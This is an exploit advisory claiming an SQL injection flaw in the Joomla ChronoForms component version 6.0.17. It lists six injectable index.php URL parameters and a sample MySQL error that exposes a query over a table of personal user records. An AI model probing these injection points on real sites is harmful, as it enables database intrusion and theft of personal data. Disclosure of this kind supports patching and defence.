#################################################################### # Exploit Title : Joomla ChronoForms Components 6.0.17 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 26/02/2019 # Vendor Homepage : chronoengine.com # Software Download Link : chronoengine.com/chronoforms # Software Information Link : extensions.joomla.org/extension/chronoforms/ # Software Affected Version : 6.0.17 and all previous versions # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** Chronoforms is the best Joomla form builder, build any kind of Joomla forms with ease. Your creative Joomla forms maker, build a responsive contact form in seconds with bootstrap CSS, with this easy to use Joomla forms builder every kind of form is possible, contact forms, payment forms, autoresponders, article form, survey, captcha, multi page and more! #################################################################### # Impact : *********** Joomla ChronoForms Components 6.0.17 [ and other versions ] component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_chronoforms&chronoform=stampaPdf&id=[SQL Injection] /index.php?option=com_chronoforms&view=form&Itemid=[SQL Injection] /index.php?option=com_chronoforms&view=form&Itemid=[SQL Injection]&lang=en /index.php?option=com_chronoforms&chronoform=[SQL Injection]&lang=en /index.php?option=com_chronoforms&chronoform=grafiekjes&product=[SQL Injection] /index.php?Itemid=[ID-NUMBER]&option=com_chronoforms&view=form&pid=[SQL Injection] #################################################################### # Example SQL Database Error : **************************** 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4 SQL=SELECT idGestioneUtenti,nomeTitolare,cognomeTitolare,ragioneSocialeTitolare,dataNascitaTitolare, codiceFiscaleTitolare,indirizzoTitolare,capTitolare,idCittaTitolare,telefonoTitolare, indirizzoUbicazione,capUbicazione,idCittaUbicazione,dataAtto,numAtto,codUtenza, idTipoUtenza,numPersone,mqSuperfice,codKit,codUmido,idTipologiaCompostiera ,idZona,idCapienzaVetro,idCapienzaVetro240,idCapienzaVetro360,idCapienzaPlastica ,idCapienzaPlastica240,idCapienzaPlastica360,idCapienzaIndifferenziato ,idCapienzaIndifferenziato240,idCapienzaIndifferenziato360,idCapienzaUmido ,idCapienzaUmido240, idCapienzaUmido360,idCapienzaCarta,idCapienzaCarta240 ,idCapienzaCarta360,idCapienzaOlioVegetale,DatiPersonaRitirante,telefonoRitirante ,note,numPlastica,numUmido,numCarta,numOlio,numIndif,cessazione FROM SATEX_gestioneUtenti WHERE idGestioneUtenti= #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################